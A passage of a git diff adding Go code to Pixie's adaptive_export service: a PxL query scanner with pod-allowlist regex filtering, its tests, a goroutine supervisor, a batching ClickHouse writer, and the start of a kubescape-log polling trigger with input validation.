+			WinStart: winStart, WinEnd: winEnd,
+			ReadCount: int64(len(rows)), WroteCount: int64(submitted),
+			Hostname: s.cfg.Hostname,
+		})
+		log.WithFields(log.Fields{
+			"table":   s.cfg.Table,
+			"pods":    len(s.currentFilter.Pods),
+			"mode":    s.currentFilter.Mode,
+			"rows":    len(rows),
+			"version": s.currentFilter.Version,
+		}).Info("streaming.TableScanner: query completed")
+
+		// 4. Sleep until refresh OR filter change.
+		select {
+		case <-ctx.Done():
+			return
+		case f, ok := <-s.filters:
+			if !ok {
+				return
+			}
+			s.currentFilter = f
+		case <-time.After(s.cfg.RefreshInterval):
+		}
+	}
+}
+
+// pxSetMaxRows raises Pixie's per-table result cap (default 10000) via the
+// query-broker's `#px:set` query flag, mirroring internal/pxl (queryfor.go /
+// compile.go). Without it the streaming/DX arm silently caps each pull at 10k
+// rows while the passthrough/ALL arm (which already emits this) does not — which
+// would UNDER-count DX and OVERSTATE the DX-vs-ALL volume reduction. Must be the
+// first line of the script (before `import px`).
+const pxSetMaxRows = "#px:set max_output_rows_per_table=1000000\n"
+
+// buildPxL renders the script for one query of s.cfg.Table over the last
+// QueryWindow, restricted to f.Pods when f is a non-empty allowlist.
+func (s *TableScanner) buildPxL(f Filter) string {
+	// Round UP to whole seconds: truncating would shrink a 1.5s window to "-1s" and a sub-second one to "-0s".
+	secs := int64((s.cfg.QueryWindow + time.Second - 1) / time.Second)
+	relStart := "-" + strconv.FormatInt(secs, 10) + "s"
+	var b strings.Builder
+	b.WriteString(pxSetMaxRows)
+	b.WriteString("import px\n")
+	b.WriteString("df = px.DataFrame(table='" + s.cfg.Table + "', start_time='" + relStart + "')\n")
+	b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n")
+	b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n")
+	if f.Mode == FilterModeAllowlist && len(f.Pods) > 0 {
+		// Allowlist clause. PxL syntax exploration (2026-05-17): `or` and `|`
+		// between equalities are rejected and px.contains is SUBSTRING-only,
+		// so use px.regex_match (RE2; carnot/funcs/builtins/regex_ops.cc)
+		// with an anchored alternation.
+		b.WriteString("df = df[px.regex_match('^(")
+		for i, k := range f.Pods {
+			if i > 0 {
+				b.WriteString("|")
+			}
+			// Regex-escape first, THEN literal-escape, so the regex's own backslashes are escaped for the PxL string.
+			b.WriteString(escapePxL(escapeRegex(k.Render())))
+		}
+		b.WriteString(")$', df.pod)]\n")
+	}
+	// Unfiltered mode emits ALL pods on this node; consumers can filter by joining adaptive_attribution.
+	b.WriteString("px.display(df, '" + s.cfg.Table + "')\n")
+	return b.String()
+}
+
+// ScannerStats — small monitoring helper.
+type ScannerStats struct {
+ Queries int64
+ Errors int64
+ RowsIn int64
+ Skipped int64
+}
+
+func (s *TableScanner) Stats() ScannerStats {
+ return ScannerStats{
+ Queries: s.queries.Load(),
+ Errors: s.queryErr.Load(),
+ RowsIn: s.rowsIn.Load(),
+ Skipped: s.skipped.Load(),
+ }
+}
+
+var pxlEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`)
+
+func escapePxL(s string) string {
+ return pxlEscaper.Replace(s)
+}
+
+// regexEscaper / escapeRegex defang regex metacharacters in pod names.
+// k8s pod names are DNS-1123 plus a "/" namespace separator — none of
+// which are regex meta — so this is purely defensive against future
+// naming rules (e.g. dots). NOTE(review): a literal backslash is NOT
+// in the table and passes through unescaped — confirm that is intended.
+var regexEscaper = strings.NewReplacer(
+ `.`, `\.`,
+ `|`, `\|`,
+ `(`, `\(`,
+ `)`, `\)`,
+ `+`, `\+`,
+ `*`, `\*`,
+ `?`, `\?`,
+ `[`, `\[`,
+ `]`, `\]`,
+ `{`, `\{`,
+ `}`, `\}`,
+ `^`, `\^`,
+ `$`, `\$`,
+)
+
+func escapeRegex(s string) string {
+ return regexEscaper.Replace(s)
+}
+
+// Keeps the fmt import referenced so the file compiles; nothing else
+// in this file uses fmt.
+var _ = fmt.Sprintf
+
+// Compile-time check that activeset.Key still has a Render method,
+// which buildPxL calls; it does not check Render's output format.
+var _ = (activeset.Key{}).Render
diff --git a/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go b/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go
new file mode 100644
index 00000000000..0e5a6b9ac1f
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go
@@ -0,0 +1,242 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "errors"
+ "strings"
+ "sync"
+ "sync/atomic"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+)
+
+// fakeQuerier captures PxL strings and returns a canned row set.
+type fakeQuerier struct {
+ mu sync.Mutex
+ queries []string
+ rows []map[string]any
+}
+
+func (f *fakeQuerier) Query(ctx context.Context, pxl string) ([]map[string]any, error) {
+ f.mu.Lock()
+ f.queries = append(f.queries, pxl)
+ f.mu.Unlock()
+ return f.rows, nil
+}
+
+// failingQuerier always returns err.
+type failingQuerier struct {
+ err error
+ mu sync.Mutex
+ hits int
+}
+
+func (f *failingQuerier) Query(ctx context.Context, pxl string) ([]map[string]any, error) {
+ f.mu.Lock()
+ f.hits++
+ f.mu.Unlock()
+ return nil, f.err
+}
+
+// flipFlopQuerier replays a script cyclically: call k uses slot k%len(failures), failing or returning results[slot].
+type flipFlopQuerier struct {
+ mu sync.Mutex
+ idx int
+ results [][]map[string]any
+ failures []bool
+}
+
+func (f *flipFlopQuerier) Query(ctx context.Context, pxl string) ([]map[string]any, error) {
+ f.mu.Lock()
+ defer f.mu.Unlock()
+ i := f.idx % len(f.failures)
+ f.idx++
+ if f.failures[i] {
+ return nil, errors.New("simulated failure")
+ }
+ return f.results[i], nil
+}
+
+// fakeWriter counts WritePixieRows invocations.
+type fakeWriter struct {
+ count atomic.Int64
+}
+
+func (f *fakeWriter) WritePixieRows(ctx context.Context, table string, rows []map[string]any) error {
+ f.count.Add(int64(len(rows)))
+ return nil
+}
+
+func TestScanner_BuildsPxLWithAllowlistOR(t *testing.T) {
+ cfg := ScannerConfig{Table: "pgsql_events"}.defaulted()
+ s := &TableScanner{cfg: cfg}
+ f := Filter{
+ Mode: FilterModeAllowlist,
+ Pods: []activeset.Key{
+ {Namespace: "n1", Pod: "a"},
+ {Namespace: "n2", Pod: "b"},
+ },
+ }
+ pxl := s.buildPxL(f)
+ if !strings.HasPrefix(pxl, "#px:set max_output_rows_per_table=1000000\n") {
+ t.Fatalf("pxl missing the #px:set cap flag (10k-cap fix); got:\n%s", pxl)
+ }
+ if !strings.Contains(pxl, "table='pgsql_events'") {
+ t.Fatalf("pxl missing table: %s", pxl)
+ }
+ if !strings.Contains(pxl, "n1/a") {
+ t.Fatalf("pxl missing first pod in regex: %s", pxl)
+ }
+ if !strings.Contains(pxl, "n2/b") {
+ t.Fatalf("pxl missing second pod in regex: %s", pxl)
+ }
+ if !strings.Contains(pxl, "px.regex_match") || !strings.Contains(pxl, "df.pod)") {
+ t.Fatalf("pxl missing px.regex_match call: %s", pxl)
+ }
+ if !strings.Contains(pxl, "^(") || !strings.Contains(pxl, ")$") {
+ t.Fatalf("pxl missing anchored alternation: %s", pxl)
+ }
+}
+
+// Unfiltered mode must not emit the allowlist clause (px.regex_match), even when Pods is populated.
+func TestScanner_UnfilteredModeOmitsAllowlist(t *testing.T) {
+	cfg := ScannerConfig{Table: "http_events"}.defaulted()
+	s := &TableScanner{cfg: cfg}
+	pxl := s.buildPxL(Filter{Mode: FilterModeUnfiltered, Pods: []activeset.Key{{Namespace: "n1", Pod: "a"}}})
+	if strings.Contains(pxl, "px.regex_match") {
+		t.Fatalf("unfiltered mode should not emit pod filter: %s", pxl)
+	}
+}
+
+func TestScanner_EmptyAllowlistSkipsQuery(t *testing.T) {
+ q := &fakeQuerier{rows: nil}
+ w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: time.Hour})
+ filtCh := make(chan Filter, 4)
+ filtCh <- Filter{Mode: FilterModeAllowlist, Pods: nil} // empty
+ cfg := ScannerConfig{Table: "pgsql_events", RefreshInterval: 100 * time.Millisecond}
+ sc := NewScanner(cfg, q, w, filtCh)
+ ctx, cancel := context.WithTimeout(context.Background(), 200*time.Millisecond)
+ defer cancel()
+ go w.Run(ctx)
+ sc.Run(ctx)
+ st := sc.Stats()
+ if st.Queries != 0 {
+ t.Fatalf("expected 0 queries on empty allowlist, got %d", st.Queries)
+ }
+ if st.Skipped == 0 {
+ t.Fatalf("expected skipped > 0")
+ }
+}
+
+// TestScanner_BackoffOnRepeatedErrors — after a Query error, the
+// scanner must back off (NOT hot-loop). After K consecutive
+// failures, the per-retry interval must be ≥ a measurable threshold.
+func TestScanner_BackoffOnRepeatedErrors(t *testing.T) {
+ q := &failingQuerier{err: errors.New("simulated broker outage")}
+ w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: 50 * time.Millisecond})
+ filtCh := make(chan Filter, 4)
+ filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}}
+ cfg := ScannerConfig{
+ Table: "pgsql_events",
+ RefreshInterval: 100 * time.Second, // huge — backoff must dominate, not refresh
+ QueryTimeout: 100 * time.Millisecond,
+ BackoffInitial: 50 * time.Millisecond,
+ BackoffMax: 200 * time.Millisecond,
+ }
+ sc := NewScanner(cfg, q, w, filtCh)
+ ctx, cancel := context.WithTimeout(context.Background(), 1*time.Second)
+ defer cancel()
+ go w.Run(ctx)
+ sc.Run(ctx)
+ st := sc.Stats()
+ // In 1 second with backoff = 50/100/200/200 → expected attempts ≤ ~10.
+ // Without backoff (hot-loop), we'd see thousands.
+ if st.Errors > 20 {
+ t.Fatalf("scanner appears to be hot-looping on errors: %d in 1s (expected ≤ 20)", st.Errors)
+ }
+ if st.Errors < 2 {
+ t.Fatalf("scanner did not retry after error: %d (expected ≥ 2)", st.Errors)
+ }
+}
+
+// TestScanner_BackoffResetsOnSuccess — once a query succeeds, the
+// backoff state must reset so the next failure waits BackoffInitial
+// (not the doubled value left over from the previous failure).
+func TestScanner_BackoffResetsOnSuccess(t *testing.T) {
+ q := &flipFlopQuerier{
+ results: [][]map[string]any{
+ nil, // first call fails
+ {{"x": 1}},
+ nil, // third call fails again
+ },
+ failures: []bool{true, false, true},
+ }
+ w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: 1 * time.Hour})
+ filtCh := make(chan Filter, 4)
+ filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}}
+ cfg := ScannerConfig{
+ Table: "pgsql_events",
+ RefreshInterval: 10 * time.Millisecond,
+ QueryTimeout: 100 * time.Millisecond,
+ BackoffInitial: 50 * time.Millisecond,
+ BackoffMax: 400 * time.Millisecond,
+ }
+ sc := NewScanner(cfg, q, w, filtCh)
+ ctx, cancel := context.WithTimeout(context.Background(), 250*time.Millisecond)
+ defer cancel()
+ go w.Run(ctx)
+ sc.Run(ctx)
+ st := sc.Stats()
+ // The script cycles fail, success, fail (then wraps: fail, success,
+ // fail, ...). Expected timeline with reset: fail@0 (wait 50ms),
+ // success@50 (sleep 10ms), fail@60 (wait 50ms again, not 100ms),
+ // fail@110 (wait 100ms), success@210, ... — so ≥ 3 queries and
+ // ≥ 2 errors fit in 250 ms.
+ //
+ // NOTE(review): these thresholds are loose; a scanner that never
+ // reset its backoff may still satisfy them — consider tightening.
+ if st.Queries < 3 {
+ t.Fatalf("scanner did fewer queries than expected; queries=%d errors=%d (backoff may not be resetting)", st.Queries, st.Errors)
+ }
+ if st.Errors < 2 {
+ t.Fatalf("expected ≥ 2 errors, got %d", st.Errors)
+ }
+}
+
+func TestScanner_QueriesOnNonEmptyFilter(t *testing.T) {
+ q := &fakeQuerier{rows: []map[string]any{{"time_": time.Now(), "pod": "n/p"}}}
+ fw := &fakeWriter{}
+ w := NewBatchWriter("pgsql_events", fw, WriterConfig{BatchEvery: 50 * time.Millisecond})
+ filtCh := make(chan Filter, 4)
+ filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}}
+ cfg := ScannerConfig{Table: "pgsql_events", RefreshInterval: 50 * time.Millisecond, QueryTimeout: 1 * time.Second}
+ sc := NewScanner(cfg, q, w, filtCh)
+ ctx, cancel := context.WithTimeout(context.Background(), 300*time.Millisecond)
+ defer cancel()
+ go w.Run(ctx)
+ sc.Run(ctx)
+ if sc.Stats().Queries == 0 {
+ t.Fatalf("expected at least one query")
+ }
+ if fw.count.Load() == 0 {
+ t.Fatalf("writer received no rows; expected at least 1")
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/supervisor.go b/src/vizier/services/adaptive_export/internal/streaming/supervisor.go
new file mode 100644
index 00000000000..8aca323aac2
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/supervisor.go
@@ -0,0 +1,95 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "sync"
+
+ log "github.com/sirupsen/logrus"
+)
+
+// Supervisor owns the lifecycle of N TableScanner + N BatchWriter
+// pairs (one pair per pixie table) plus the shared FilterUpdater.
+// Single entry point from main.go.
+//
+// Goroutine inventory at steady state:
+//
+// 1 FilterUpdater
+// N TableScanners (1 per pixie table)
+// N BatchWriters (1 per pixie table)
+// ──────────────────
+// 1 + 2N total
+//
+// For N=10 (current PushPixieTables count): 21 goroutines, constant
+// regardless of active hash count.
+type Supervisor struct {
+ updater *FilterUpdater
+ scanners []*TableScanner
+ writers []*BatchWriter
+ tables []string
+
+ wg sync.WaitGroup
+}
+
+// NewSupervisor builds one BatchWriter and one TableScanner per entry
+// in tables. Every scanner is given its own updater.Subscribe()
+// channel and a copy of scannerCfg with Table set to its table name.
+func NewSupervisor(
+	updater *FilterUpdater,
+	querier Querier,
+	sink SinkWriter,
+	tables []string,
+	scannerCfg ScannerConfig,
+	writerCfg WriterConfig,
+) *Supervisor {
+	sup := &Supervisor{updater: updater, tables: tables}
+	// writers[i] and scanners[i] always belong to tables[i]; Run pairs them by index.
+	for _, table := range tables {
+		perTable := scannerCfg
+		perTable.Table = table
+
+		writer := NewBatchWriter(table, sink, writerCfg)
+		scanner := NewScanner(perTable, querier, writer, updater.Subscribe())
+
+		sup.writers = append(sup.writers, writer)
+		sup.scanners = append(sup.scanners, scanner)
+	}
+	return sup
+}
+
+// Run starts the FilterUpdater and every writer/scanner pair on their own
+// goroutines (all sharing ctx), then blocks until all of them have returned.
+func (s *Supervisor) Run(ctx context.Context) {
+	log.WithFields(log.Fields{
+		"tables":     len(s.tables),
+		"goroutines": 1 + 2*len(s.tables),
+	}).Info("streaming.Supervisor: starting rev-3 push flow")
+
+	// spawn runs fn on a new goroutine tracked by s.wg.
+	spawn := func(fn func()) {
+		s.wg.Add(1)
+		go func() { defer s.wg.Done(); fn() }()
+	}
+	spawn(func() { s.updater.Run(ctx) })
+	for i := range s.scanners {
+		sc, w := s.scanners[i], s.writers[i]
+		spawn(func() { w.Run(ctx) })
+		spawn(func() { sc.Run(ctx) })
+	}
+	s.wg.Wait()
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/writer.go b/src/vizier/services/adaptive_export/internal/streaming/writer.go
new file mode 100644
index 00000000000..313ab1ae4cf
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/writer.go
@@ -0,0 +1,154 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+)
+
+// SinkWriter is the abstraction over sink.WritePixieRows. Defining
+// it here avoids a sink package import cycle and lets tests inject
+// fakes.
+type SinkWriter interface {
+	// WritePixieRows writes rows for the named table. BatchWriter calls it
+	// once per flush with the whole buffered batch and only logs a
+	// non-nil error; it does not propagate or retry it.
+	WritePixieRows(ctx context.Context, table string, rows []map[string]any) error
+}
+
+// BatchWriter buffers per-table pixie rows and flushes them as one
+// CH INSERT either when the buffer reaches BatchRows or when the
+// BatchEvery ticker fires (the ticker is reset after a size-triggered
+// flush), whichever comes first. A failed flush is logged and its rows
+// are discarded, not retried. One goroutine per BatchWriter.
+//
+// Why batching: rev-2's per-hash fan-out produced ~10 small INSERTs
+// per pass per pod. CH handles small INSERTs poorly (each spawns a
+// merge; merge throughput is the bottleneck on heavily-active
+// tables). One larger INSERT per N seconds dramatically reduces
+// merge pressure.
+type BatchWriter struct {
+	table      string                // table name passed to the sink on every flush
+	sink       SinkWriter            // destination for flushed batches
+	in         chan []map[string]any // Submit → Run hand-off; one element per accepted Submit call
+	batchRows  int                   // buffered-row threshold that triggers a flush
+	batchEvery time.Duration         // ticker period for time-based flushes
+	bufferCap  int                   // capacity the in channel was created with
+}
+
+// WriterConfig tunes a BatchWriter. Zero or negative values fall back to
+// the per-field defaults below.
+type WriterConfig struct {
+	BatchRows  int           // flush when buffered ≥ this many rows. default 10000.
+	BatchEvery time.Duration // flush when this much time has elapsed. default 5 s.
+	BufferCap  int           // input chan capacity, counted in Submit calls (row slices), not rows. default 64.
+}
+
+func (c WriterConfig) defaulted() WriterConfig {
+ if c.BatchRows <= 0 {
+ c.BatchRows = 10000
+ }
+ if c.BatchEvery <= 0 {
+ c.BatchEvery = 5 * time.Second
+ }
+ if c.BufferCap <= 0 {
+ c.BufferCap = 64
+ }
+ return c
+}
+
+// NewBatchWriter returns a writer for table that flushes to sink. cfg is
+// passed through defaulted first, so zero fields take their defaults. The
+// writer is idle until its Run method is called.
+func NewBatchWriter(table string, sink SinkWriter, cfg WriterConfig) *BatchWriter {
+	effective := cfg.defaulted()
+
+	w := new(BatchWriter)
+	w.table = table
+	w.sink = sink
+	w.batchRows = effective.BatchRows
+	w.batchEvery = effective.BatchEvery
+	w.bufferCap = effective.BufferCap
+	w.in = make(chan []map[string]any, effective.BufferCap)
+	return w
+}
+
+// Submit offers rows to the writer without ever blocking. An empty slice is
+// accepted trivially. If the input channel has room the slice is queued and
+// Submit returns true; otherwise the whole slice is dropped, a warning is
+// logged here, and Submit returns false.
+func (w *BatchWriter) Submit(rows []map[string]any) bool {
+	if len(rows) == 0 {
+		return true
+	}
+
+	accepted := false
+	select {
+	case w.in <- rows:
+		accepted = true
+	default:
+		// Channel full: fall through to the drop path below.
+	}
+
+	if !accepted {
+		log.WithFields(log.Fields{
+			"table": w.table,
+			"rows":  len(rows),
+		}).Warn("streaming.BatchWriter: input chan full, dropping batch")
+	}
+	return accepted
+}
+
+// Run owns the BatchWriter goroutine. It accumulates submitted rows and
+// flushes them to the sink when the buffer reaches batchRows or when the
+// batchEvery ticker fires. When ctx is cancelled it picks up whatever is
+// already queued on the input channel, attempts one best-effort final
+// flush, and returns.
+func (w *BatchWriter) Run(ctx context.Context) {
+	// flushTimeout bounds one sink write so a stalled CH HTTP doesn't pin us.
+	const flushTimeout = 60 * time.Second
+
+	var buf []map[string]any
+	ticker := time.NewTicker(w.batchEvery)
+	defer ticker.Stop()
+
+	// flush writes buf to the sink under a context derived from parent and
+	// then empties buf whether or not the write succeeded: a failed batch is
+	// logged and dropped, not retried.
+	flush := func(parent context.Context, reason string) {
+		if len(buf) == 0 {
+			return
+		}
+		fctx, cancel := context.WithTimeout(parent, flushTimeout)
+		err := w.sink.WritePixieRows(fctx, w.table, buf)
+		cancel()
+		fields := log.Fields{
+			"table":  w.table,
+			"rows":   len(buf),
+			"reason": reason,
+		}
+		if err != nil {
+			log.WithError(err).WithFields(fields).Warn("streaming.BatchWriter: flush failed")
+		} else {
+			log.WithFields(fields).Info("streaming.BatchWriter: flushed batch")
+		}
+		buf = buf[:0]
+	}
+
+	for {
+		select {
+		case <-ctx.Done():
+			// Collect batches Submit already accepted but Run has not read
+			// yet; without this they would be silently lost on shutdown.
+		drain:
+			for {
+				select {
+				case rows := <-w.in:
+					buf = append(buf, rows...)
+				default:
+					break drain
+				}
+			}
+			// ctx is already cancelled here, so a flush context derived from
+			// it would be dead on arrival and the final write could never
+			// succeed. Use a detached context; flushTimeout still bounds it.
+			flush(context.Background(), "shutdown")
+			return
+
+		case rows := <-w.in:
+			buf = append(buf, rows...)
+			if len(buf) >= w.batchRows {
+				flush(ctx, "size")
+				// Reset ticker so we don't get a redundant flush 100ms later
+				ticker.Reset(w.batchEvery)
+			}
+
+		case <-ticker.C:
+			flush(ctx, "timer")
+		}
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel b/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel
new file mode 100644
index 00000000000..367e6acc1f0
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel
@@ -0,0 +1,45 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "trigger",
+ srcs = [
+ "clickhouse.go",
+ "watermark.go",
+ ],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/chhttp",
+ "//src/vizier/services/adaptive_export/internal/kubescape",
+ "@com_github_sirupsen_logrus//:logrus",
+ ],
+)
+
+pl_go_test(
+ name = "trigger_test",
+ srcs = [
+ "clickhouse_internal_test.go",
+ "clickhouse_test.go",
+ "fingerprint_bench_test.go",
+ "watermark_test.go",
+ ],
+ embed = [":trigger"],
+ deps = ["//src/vizier/services/adaptive_export/internal/kubescape"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go
new file mode 100644
index 00000000000..63fbcd2a793
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go
@@ -0,0 +1,498 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package trigger watches forensic_db.kubescape_logs for new rows and
+// pushes parsed kubescape.Event values onto a channel. Polls the
+// ClickHouse HTTP interface (default 250ms cadence). Operator runs as
+// a DaemonSet — each instance polls only its OWN node's rows via
+// `WHERE hostname = '<Config.Hostname>'`.
+package trigger
+
+import (
+ "bufio"
+ "bytes"
+ "context"
+ "crypto/sha256"
+ "encoding/hex"
+ "encoding/json"
+ "fmt"
+ "io"
+ "net/http"
+ "net/url"
+ "regexp"
+ "strconv"
+ "strings"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape"
+)
+
+// Config configures the trigger. PollInterval defaults to 250ms.
+// Hostname is REQUIRED — it scopes every poll to a single node.
+type Config struct {
+	Endpoint     string // ClickHouse HTTP base URL; New requires an http or https scheme and a non-empty host
+	Database     string // defaults to "forensic_db"; must be a plain identifier
+	Table        string // defaults to "kubescape_logs"; must be a plain identifier
+	Username     string // when non-empty, polls are sent with HTTP basic auth
+	Password     string
+	Hostname     string
+	PollInterval time.Duration
+
+	// InitialWatermark is the starting cursor used when Watermark is nil,
+	// or when the persistent store has no entry or its load fails. It is
+	// normalized to nanoseconds before use. The production wiring
+	// always supplies Watermark and leaves this zero.
+	InitialWatermark uint64
+
+	// Watermark, when non-nil, makes the trigger persistent across
+	// restarts: the first poll loads from the store; successful
+	// advances are saved back (throttled by WatermarkSaveInterval).
+	// nil → behaves like pre-watermark trigger (in-memory only,
+	// starts from InitialWatermark; previously the source of the
+	// "infinite full-table replay after OOM" bug).
+	Watermark WatermarkStore
+
+	// WatermarkSaveInterval throttles persistent writes — we'd
+	// otherwise INSERT every 250ms on a busy node. Default 5s.
+	WatermarkSaveInterval time.Duration
+
+	// PollLimit caps rows returned per poll. Bounds catch-up work
+	// after a restart so a 10h backlog doesn't translate into a
+	// single multi-GiB SELECT the HTTP client times out on; instead
+	// it drains in N polls of PollLimit rows. Default 10000.
+	// 0 → the default (New replaces it with 10000; there is no
+	// "unlimited" setting). Negative values are rejected by New.
+	PollLimit int
+
+	// HTTPTimeout bounds each individual poll. Default 30s; previously
+	// hardcoded to 5s, which under any backlog caused every poll to
+	// time out mid-stream → watermark never advanced.
+	HTTPTimeout time.Duration
+}
+
+// ClickHouseHTTP polls the configured Database.Table (by default
+// forensic_db.kubescape_logs) over the ClickHouse HTTP interface,
+// scoped to a single node.
+type ClickHouseHTTP struct {
+	cfg    Config       // validated and defaulted by New
+	client *http.Client // reused for every poll; New sets its Timeout to cfg.HTTPTimeout
+}
+
+// New checks cfg, fills in defaults, and returns a trigger ready for
+// Subscribe. It fails when Endpoint or Hostname is empty, when Endpoint is
+// not an http/https URL with a host, when Database or Table is not a plain
+// identifier, or when PollLimit is negative. Defaults: Database
+// "forensic_db", Table "kubescape_logs", PollInterval 250ms,
+// WatermarkSaveInterval 5s, PollLimit 10000, HTTPTimeout 30s.
+func New(cfg Config) (*ClickHouseHTTP, error) {
+	switch {
+	case cfg.Endpoint == "":
+		return nil, fmt.Errorf("trigger: empty Endpoint")
+	case cfg.Hostname == "":
+		return nil, fmt.Errorf("trigger: empty Hostname (operator must run node-local)")
+	}
+
+	endpoint, err := url.Parse(cfg.Endpoint)
+	if err != nil {
+		return nil, fmt.Errorf("trigger: invalid Endpoint %q: %w", cfg.Endpoint, err)
+	}
+	switch {
+	case !(endpoint.Scheme == "http" || endpoint.Scheme == "https"):
+		return nil, fmt.Errorf("trigger: Endpoint %q must use http or https scheme", cfg.Endpoint)
+	case endpoint.Host == "":
+		return nil, fmt.Errorf("trigger: Endpoint %q has empty host", cfg.Endpoint)
+	}
+
+	if cfg.Database == "" {
+		cfg.Database = "forensic_db"
+	}
+	if cfg.Table == "" {
+		cfg.Table = "kubescape_logs"
+	}
+	// Database and Table are spliced into the SELECT as identifiers, which
+	// cannot be parameterised or value-quoted the way Hostname is (quoteCH),
+	// so they are restricted to [A-Za-z_][A-Za-z0-9_]* here instead.
+	if !validIdentifier(cfg.Database) {
+		return nil, fmt.Errorf("trigger: invalid Database identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Database)
+	}
+	if !validIdentifier(cfg.Table) {
+		return nil, fmt.Errorf("trigger: invalid Table identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Table)
+	}
+
+	if cfg.PollInterval <= 0 {
+		cfg.PollInterval = 250 * time.Millisecond
+	}
+	if cfg.WatermarkSaveInterval <= 0 {
+		cfg.WatermarkSaveInterval = 5 * time.Second
+	}
+	switch {
+	case cfg.PollLimit < 0:
+		return nil, fmt.Errorf("trigger: PollLimit must be >= 0 (got %d)", cfg.PollLimit)
+	case cfg.PollLimit == 0:
+		cfg.PollLimit = 10000
+	}
+	if cfg.HTTPTimeout <= 0 {
+		cfg.HTTPTimeout = 30 * time.Second
+	}
+
+	trg := &ClickHouseHTTP{cfg: cfg}
+	trg.client = &http.Client{Timeout: cfg.HTTPTimeout}
+	return trg, nil
+}
+
+// identifierRE matches a plain ClickHouse identifier: letters, digits and
+// underscores, with a non-digit first character. Dotted names such as
+// "http2_messages.beta" are rejected on purpose, because the trigger only
+// ever queries the kubescape ingest table, not a pixie observation table.
+var identifierRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)
+
+// validIdentifier reports whether s, in its entirety, is a plain identifier
+// as defined by identifierRE.
+func validIdentifier(s string) bool {
+	return identifierRE.MatchString(s)
+}
+
+// Subscribe launches the poll loop on its own goroutine and returns the
